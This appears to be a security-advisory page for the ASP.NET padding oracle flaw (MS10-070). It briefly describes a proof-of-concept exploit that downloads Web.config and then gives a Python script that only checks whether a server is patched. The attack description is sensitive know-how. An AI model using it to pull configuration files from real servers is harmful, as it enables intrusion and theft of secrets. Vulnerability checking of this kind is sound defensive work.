Video _http://vimeo.com/15856549
This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file.
This proof of concept exploit can be found at ampliasecurity.com/research/aspx_po_chotext_attack.rb
#!/usr/bin/env python
#
# PoC for checking if MS10-070 patch is applied by providing a .NET
# application ScriptResource or WebResource resource handler's 'd' block
#
# Credits go to:
#
# * Juliano Rizzo - for the amazing research and hints about the remote
# passive check
# <http://twitter.com/julianor/status/26419702099>
#
# * Brian Holyfield - for his tool to exploit Padding Oracle attacks in a
# generic and easy way
# <https://www.gdssecurity.com/l/t/d.php?k=PadBuster>
#
# * Giorgio Fedon - for initial Perl version of this check
# <http://blog.mindedsecurity.com/2010/09/investigating-net-padding-oracle.html>
#
# * Alejo Murillo Moya - for testing and ideas
#
#
# Copyright (c) 2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
#
#
# Example of unpatched system:
#
# * /WebResource.axd?d=kHoDoPikaYfoTe1m9Ol5iQ2
# * /ScriptResource.axd?d=2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10
#
# Examples of patched system:
#
# * /WebResource.axd?d=VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0
# * /ScriptResource.axd?d=Gcb5Zt1XkIPHAYC3l5vZ4QidrZMKISjkqnMQRQDqRD88oxkWIL1kNBQThGrDJBbaKqPd9AyT-jF1EhM-rame5NXv7RLQRhtlz-xfoQlHXf_pjgiBJW7ntGxhegohUeNFlo9x8_RMU6ocDmwwK6dfIRDFbX01
import sys
def base64decode(string):
return string.decode("base64")
def hexdecode(string):
string = string.lower()
if string.startswith("0x"):
string = string[2:]
return string.decode("hex")
def hexencode(string):
return string.encode("hex")
def dotNetUrlTokenDecode(string):
"""
Ported from padbuster v0.3 by Brian Holyfield:
sub web64Decode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input =~ s/\-/\+/g;
$input =~ s/\_/\//g;
if ($net == 1)
{
my $count = chop($input);
$input = $input.("=" x int($count));
}
return decode_base64($input);
}
"""
string = string.replace("-", "+").replace("_", "/")
count = string[-1]
if count.isdigit():
string = string[:-1] + ("=" * int(count))
return base64decode(string)
def usage():
print """
Use:
./ms10-070_check.py <encrypted_d_block>
Note:
Encrypted 'd' block MUST be from ScriptResource.axd or WebResource.axd.
Parse the application response body to find a valid one.
Examples:
With ScriptResource.axd 'd' block:
$ ./ms10-070_check.py 2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10
Your application is VULNERABLE, patch against MS10-070
With WebResource.axd 'd' block:
./ms10-070_check.py VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0
Your application is NOT vulnerable
"""
def main():
if len(sys.argv) < 2:
usage()
sys.exit(1)
if (len(dotNetUrlTokenDecode(sys.argv[1])) % 8) == 0:
print "Your application is VULNERABLE, patch against MS10-070"
else:
print "Your application is NOT vulnerable"
if __name__ == '__main__':
main()
